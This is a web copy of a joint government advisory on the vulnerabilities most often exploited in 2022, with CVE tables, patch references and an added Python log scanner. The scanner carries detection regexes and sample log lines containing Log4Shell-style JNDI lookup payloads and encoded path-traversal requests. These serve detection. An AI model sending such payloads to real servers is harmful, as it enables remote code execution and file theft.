Metric | CVSS2 | CVSS3 |
---|---|---|
Attack Vector | NETWORK | NETWORK |
Attack Complexity | LOW | LOW |
Authentication (CVSS2) / Privileges Required (CVSS3) | NONE | NONE |
User Interaction | | NONE |
Scope | | CHANGED |
Confidentiality Impact | COMPLETE | LOW |
Integrity Impact | COMPLETE | HIGH |
Availability Impact | COMPLETE | HIGH |
Vector | AV:N/AC:L/Au:N/C:C/I:C/A:C | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H |

EPSS Percentile: 100.0%
The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):
This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.
Download the PDF version of this report: AA23-215A PDF (PDF, 980.90 KB)
In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.
Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).
Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, widespread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. Multiple CVEs or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.
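As an added illustration of the detection point above (example code written for this page, not part of the advisory), the script below scans constructed web-server access-log lines for request data matching two of the CWE classes in the tables that follow: expression-language lookups (CWE-917, the Log4Shell class) and parent-directory traversal (CWE-22), checked after percent-decoding so encoded variants do not slip past. The log format, the signatures and the sample lines are assumptions made for the example, not a vendor or IDS ruleset.

```python
import re
import urllib.parse
from dataclasses import dataclass

# Apache/nginx "combined" access-log layout; an assumption for this example,
# adjust LOG_RE to the format your servers actually emit.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Illustrative signatures keyed by the CWE class the advisory's tables cite.
# These are assumptions made for the example, not a vendor or IDS ruleset.
LOOKUP_RE = re.compile(r"\$\{[^{}]*jndi\s*:", re.IGNORECASE)  # ${jndi:...} lookup (CWE-917)
NESTED_RE = re.compile(r"\$\{[^{}]*\$\{")                      # nested ${..${..}} used to obfuscate a lookup
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")                   # "../" segment once decoding is undone (CWE-22)


@dataclass(frozen=True)
class Finding:
    line_no: int
    src_ip: str
    cwe: str
    field: str
    detail: str


def normalize(value: str) -> str:
    """Percent-decode up to twice so double-encoded sequences (%252e) collapse,
    then unify path separators so a backslash cannot dodge the traversal check."""
    decoded = value
    for _ in range(2):
        decoded = urllib.parse.unquote(decoded)
    return decoded.replace("\\", "/")


def inspect_field(name: str, raw: str) -> list:
    """Return (cwe, field, detail) tuples for each signature the decoded field matches."""
    text = normalize(raw)
    hits = []
    if LOOKUP_RE.search(text) or NESTED_RE.search(text):
        hits.append(("CWE-917", name, "expression-language lookup in request data"))
    if name == "path":
        # Traversal only matters in the path component; drop the query string first.
        if TRAVERSAL_RE.search(text.split("?", 1)[0]):
            hits.append(("CWE-22", name, "parent-directory traversal after decoding"))
    return hits


def scan(lines) -> list:
    """Parse each access-log line and collect findings for path, Referer and User-Agent."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a production pipeline would count and alert on these
        for field in ("path", "referer", "ua"):
            for cwe, fname, detail in inspect_field(field, m.group(field)):
                findings.append(Finding(line_no, m.group("ip"), cwe, fname, detail))
    return findings


# Constructed sample traffic (RFC 5737 addresses, .invalid hostnames); not real captures.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2023:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2023:10:00:01 +0000] "GET /cgi-bin/.%2e/.%2e/secret.txt HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.8 - - [01/Jan/2023:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '198.51.100.9 - - [01/Jan/2023:10:00:03 +0000] "GET /login?u=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [01/Jan/2023:10:00:04 +0000] "GET /search?q=what..is HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} from {f.src_ip}: {f.cwe} via {f.field} ({f.detail})")
```

The last sample line shows why decoding and component splitting matter: ".." inside a query value is benign and produces no finding, while the double-encoded path and the nested lookup in a query string are both caught.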
Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:
Table 1: Top 12 Routinely Exploited Vulnerabilities in 2022

CVE | Vendor | Product | Type | CWE |
---|---|---|---|---|
CVE-2018-13379 | Fortinet | FortiOS and FortiProxy | SSL VPN credential exposure | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-34473 (ProxyShell) | Microsoft | Exchange Server | RCE | CWE-918: Server-Side Request Forgery (SSRF) |
CVE-2021-31207 (ProxyShell) | Microsoft | Exchange Server | Security Feature Bypass | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-34523 (ProxyShell) | Microsoft | Exchange Server | Elevation of Privilege | CWE-287: Improper Authentication |
CVE-2021-40539 | Zoho ManageEngine | ADSelfService Plus | RCE/Authentication Bypass | CWE-287: Improper Authentication |
CVE-2021-26084 | Atlassian | Confluence Server and Data Center | Arbitrary code execution | CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) |
CVE-2021-44228 (Log4Shell) | Apache | Log4j2 | RCE | CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’); CWE-20: Improper Input Validation; CWE-400: Uncontrolled Resource Consumption; CWE-502: Deserialization of Untrusted Data |
CVE-2022-22954 | VMware | Workspace ONE Access and Identity Manager | RCE | CWE-94: Improper Control of Generation of Code (‘Code Injection’) |
CVE-2022-22960 | VMware | Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | CWE-269: Improper Privilege Management |
CVE-2022-1388 | F5 Networks | BIG-IP | Missing Authentication Vulnerability | CWE-306: Missing Authentication for Critical Function |
CVE-2022-30190 | Microsoft | Multiple Products | RCE | None Listed |
CVE-2022-26134 | Atlassian | Confluence Server and Data Center | RCE | CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) |
In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.
Table 2: Additional Routinely Exploited Vulnerabilities in 2022

CVE | Vendor | Product | Type | CWE |
---|---|---|---|---|
CVE-2017-0199 | Microsoft | Multiple Products | Arbitrary Code Execution | None Listed |
CVE-2017-11882 | Microsoft | Exchange Server | Arbitrary Code Execution | CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer |
CVE-2019-11510 | Ivanti | Pulse Secure Pulse Connect Secure | Arbitrary File Reading | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2019-0708 | Microsoft | Remote Desktop Services | RCE | CWE-416: Use After Free |
CVE-2019-19781 | Citrix | Application Delivery Controller and Gateway | Arbitrary Code Execution | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2020-5902 | F5 Networks | BIG-IP | RCE | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2020-1472 | Microsoft | Multiple Products | Privilege Escalation | CWE-330: Use of Insufficiently Random Values |
CVE-2020-14882 | Oracle | WebLogic Server | RCE | None Listed |
CVE-2020-14883 | Oracle | WebLogic Server | RCE | None Listed |
CVE-2021-20016 | SonicWALL | SSLVPN SMA100 | SQL Injection | CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) |
CVE-2021-26855 (ProxyLogon) | Microsoft | Exchange Server | RCE | CWE-918: Server-Side Request Forgery (SSRF) |
CVE-2021-27065 (ProxyLogon) | Microsoft | Exchange Server | RCE | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-26858 (ProxyLogon) | Microsoft | Exchange Server | RCE | None Listed |
CVE-2021-26857 (ProxyLogon) | Microsoft | Exchange Server | RCE | CWE-502: Deserialization of Untrusted Data |
CVE-2021-20021 | SonicWALL | Email Security | Privilege Escalation Exploit Chain | CWE-269: Improper Privilege Management |
CVE-2021-40438 | Apache | HTTP Server | Server-Side Request Forgery | CWE-918: Server-Side Request Forgery (SSRF) |
CVE-2021-41773 | Apache | HTTP Server | Server Path Traversal | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-42013 | Apache | HTTP Server | Server Path Traversal | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-20038 | SonicWall | SMA 100 Series Appliances | Stack-based Buffer Overflow | CWE-787: Out-of-bounds Write; CWE-121: Stack-based Buffer Overflow |
CVE-2021-45046 | Apache | Log4j | RCE | CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) |
CVE-2022-42475 | Fortinet | FortiOS | Heap-based Buffer Overflow | CWE-787: Out-of-bounds Write |
CVE-2022-24682 | Zimbra | Collaboration Suite | Cross-site Scripting | CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
CVE-2022-22536 | SAP | Internet Communication Manager (ICM) | HTTP Request Smuggling | CWE-444: Inconsistent Interpretation of HTTP Requests (‘HTTP Request/Response Smuggling’) |
CVE-2022-22963 | VMware Tanzu | Spring Cloud | RCE | CWE-94: Improper Control of Generation of Code (‘Code Injection’); CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) |
CVE-2022-29464 | WSO2 | Multiple Products | RCE | CWE-434: Unrestricted Upload of File with Dangerous Type |
CVE-2022-27924 | Zimbra | Zimbra Collaboration Suite | Command Injection | CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) |
CVE-2022-22047 | Microsoft | Windows CSRSS | Elevation of Privilege | CWE-269: Improper Privilege Management |
CVE-2022-27593 | QNAP | QNAP NAS | Externally Controlled Reference | CWE-610: Externally Controlled Reference to a Resource in Another Sphere |
CVE-2022-41082 | Microsoft | Exchange Server | Privilege Escalation | None Listed |
CVE-2022-40684 | Fortinet | FortiOS, FortiProxy, FortiSwitchManager | Authentication Bypass | CWE-306: Missing Authentication for Critical Function |
The authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:
For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.
The authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on CPGs, including additional recommended baseline protections.
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
August 3, 2023: Initial version.
CVE | Vendor | Affected Products and Versions | Patch Information | Resources |
---|---|---|---|---|
CVE-2017-0199 | Microsoft | Multiple Products | Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows | |
CVE-2017-11882 | Microsoft | Office, Multiple Versions | Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882 | |
CVE-2018-13379 | Fortinet | FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 | FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests | Joint CSAs: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities; Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology; APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations |
CVE-2019-11510 | Ivanti | Pulse Secure Pulse Connect Secure versions 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12 | SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX | CISA Alerts: Continued Exploitation of Pulse Secure VPN Vulnerability; Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. ACSC Advisory: 2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software. Joint CSA: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations. CCCS Alert: APT Actors Target U.S. and Allied Networks - Update 1 |
CVE-2019-0708 | Microsoft | Remote Desktop Services | Remote Desktop Services Remote Code Execution Vulnerability | |
CVE-2019-19781 | Citrix | ADC and Gateway version 13.0 all supported builds before 13.0.47.24; NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18, version 12.0 all supported builds before 12.0.63.13, version 11.1 all supported builds before 11.1.63.15, version 10.5 all supported builds before 10.5.70.12; SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b | CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance | Joint CSAs: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations; Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. CCCS Alert: Detecting Compromises relating to Citrix CVE-2019-19781 |
CVE-2020-5902 | F5 | BIG-IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5 | K52145254: TMUI RCE vulnerability CVE-2020-5902 | CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902 |
CVE-2020-1472 | Microsoft | Windows Server, Multiple Versions | Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472 | ACSC Advisory: 2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472). Joint CSA: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations. CCCS Alert: Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1 |
CVE-2020-14882 | Oracle | WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 | Oracle Critical Patch Update Advisory - October 2020 | |
CVE-2020-14883 | Oracle | WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 | Oracle Critical Patch Update Advisory - October 2020 | |
CVE-2021-20016 | SonicWALL | SSLVPN SMA100, Build Version 10.x | Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x | |
CVE-2021-26855 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities |
CVE-2021-26857 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities |
CVE-2021-26858 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities |
CVE-2021-27065 | Microsoft | Multiple Products | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities |
CVE-2021-20021 | SonicWALL | Email Security version 10.0.9.x | SonicWall Email Security pre-authentication administrative account creation vulnerability | |
CVE-2021-31207 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207 | CISA Alert: Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities. ACSC Alert: Microsoft Exchange ProxyShell Targeting in Australia |
CVE-2022-26134 | Atlassian | Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 | Confluence Security Advisory 2022-06-02 | CISA Alert: CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog. ACSC Alert: Remote code execution vulnerability present in Atlassian Confluence Server and Data Center |
CVE-2021-34473 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473 | Joint CSA: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities |
CVE-2021-34523 | Microsoft | Microsoft Exchange Server 2013 Cumulative Update 23; Microsoft Exchange Server 2016 Cumulative Updates 19 and 20; Microsoft Exchange Server 2019 Cumulative Updates 8 and 9 | Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523 | CISA Alert: Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities |
CVE-2021-26084 | Jira Atlassian | Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5 | Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084 | CISA Alert: Atlassian Releases Security Updates for Confluence Server and Data Center |
CVE-2021-40539 | Zoho ManageEngine Corp. | ManageEngine ADSelfService Plus builds up to 6113 | Security advisory - ADSelfService Plus authentication bypass vulnerability | ACSC Alert: Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors |
CVE-2021-40438 | Apache | HTTP Server 2.4.48 | | |
CVE-2021-41773 | Apache | Apache HTTP Server 2.4.49 | Apache HTTP Server 2.4 vulnerabilities | |
CVE-2021-42013 | Apache | Apache HTTP Server 2.4.50 | Apache HTTP Server 2.4 vulnerabilities | |
CVE-2021-20038 | SonicWall | SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv | SonicWall patches multiple SMA100 affected vulnerabilities | ACSC Alert: Remote code execution vulnerability present in SonicWall SMA 100 series appliances. CCCS Alert: SonicWall Security Advisory |
CVE-2021-44228 | Apache | Log4j, all versions from 2.0-beta9 to 2.14.1. For other affected vendors and products, see CISA’s GitHub repository. | Apache Log4j Security Vulnerabilities. For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities | CISA webpage: Apache Log4j Vulnerability Guidance. CCCS Alert: Active exploitation of Apache Log4j vulnerability - Update 7. ACSC Advisory: 2021-007: Log4j vulnerability – advice and mitigations. ACSC Publication: Log4j: What Boards and Directors Need to Know |
CVE-2021-45046 | Apache | Log4j 2.15.0 | Apache Log4j Security Vulnerabilities | |
CVE-2022-42475 | Fortinet | FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier | FortiOS - heap-based buffer overflow in sslvpnd | |
CVE-2022-24682 | Zimbra | Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) | Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release | |
CVE-2022-22536 | SAP | NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM) | Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher | CISA Alert: Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM) |
CVE-2022-22963 | VMware Tanzu | Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions | CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression | |
CVE-2022-22954 | VMware | Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0; Identity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3; vRealize Automation (vIDM) 8.x, 7.6; VMware Cloud Foundation (vIDM) 4.x; vRealize Suite Lifecycle Manager (vIDM) 8.x | VMware Advisory VMSA-2022-0011 | |
CVE-2022-22960 | VMware | Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0; Identity Manager (vIDM) and vRealize Automation 3.3.6, 3.3.5, 3.3.4, 3.3.3; vRealize Automation (vIDM) 8.x, 7.6; VMware Cloud Foundation (vIDM) 4.x; VMware Cloud Foundation (vRA) 3.x; vRealize Suite Lifecycle Manager (vIDM) 8.x | VMSA-2022-0011 | |
CVE-2022-29464 | WSO2 | WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0 | WSO2 Documentation - Spaces | |
CVE-2022-27924 | Zimbra | Zimbra Collaboration Suite, 8.8.15 and 9.0 | Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release | |
CVE-2022-1388 | F5 Networks | F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions | K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388 | Joint CSA: Threat Actors Exploiting F5 BIG-IP CVE-2022-1388 |
CVE-2022-30190 | Microsoft | Exchange Server, Multiple Versions | CISA Alert: Microsoft Releases Workaround Guidance for MSDT “Follina” Vulnerability | |
CVE-2022-22047 | Microsoft | Multiple Products | Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047 | |
CVE-2022-27593 | QNAP | Certain QNAP NAS running Photo Station with internet exposure; Asustor Network Attached Storage | DeadBolt Ransomware | |
CVE-2022-41082 | Microsoft | Exchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23 | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082 | ACSC Alert: Vulnerability Alert – 2 new Vulnerabilities associated with Microsoft Exchange |
CVE-2022-40684 | Fortinet | FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 | FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface | |
www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi
www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0
www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472
www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4
www.cyber.gov.au/about-us/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software
www.cyber.gov.au/about-us/advisories/2021-007-log4j-vulnerability-advice-and-mitigations
www.cyber.gov.au/about-us/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472
www.cyber.gov.au/about-us/alerts/critical-vulnerability-manageengine-adselfservice-plus-exploited-cyber-actors
www.cyber.gov.au/about-us/alerts/microsoft-exchange-proxyshell-targeting-australia
www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence
www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances
www.cyber.gov.au/about-us/alerts/vulnerability-alert-2-new-vulnerabilities-associated-microsoft-exchange
www.cyber.gov.au/resources-business-and-government/essential-cyber-security/essential-eight/essential-eight-maturity-model
www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/log4j-what-boards-and-directors-need-know
www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/vulnerability-disclosure-programs-explained
www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/cyber-supply-chains/cyber-supply-chain-risk-management
www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/managed-services/how-manage-your-security-when-engaging-managed-service-provider
www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/implementing-multi-factor-authentication
www.dhs.gov
www.dhs.gov/foia
www.dhs.gov/performance-financial-reports
www.facebook.com/CISA
www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a&title=2022%20Top%20Routinely%20Exploited%20Vulnerabilities
www.fortiguard.com/psirt/FG-IR-20-233
www.fortiguard.com/psirt/FG-IR-22-377
www.fortiguard.com/psirt/FG-IR-22-398
www.instagram.com/cisagov
www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency
www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a
www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html
www.oig.dhs.gov/
www.oracle.com/security-alerts/cpuoct2020traditional.html
www.oracle.com/security-alerts/cpuoct2020traditional.html
www.qnap.com/en/security-advisory/qsa-22-24
www.usa.gov/
www.vmware.com/security/advisories/VMSA-2022-0011.html
www.vmware.com/security/advisories/VMSA-2022-0011.html
www.whitehouse.gov/
www.youtube.com/@cisagov
mailto:?subject=2022%20Top%20Routinely%20Exploited%20Vulnerabilities&body=www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a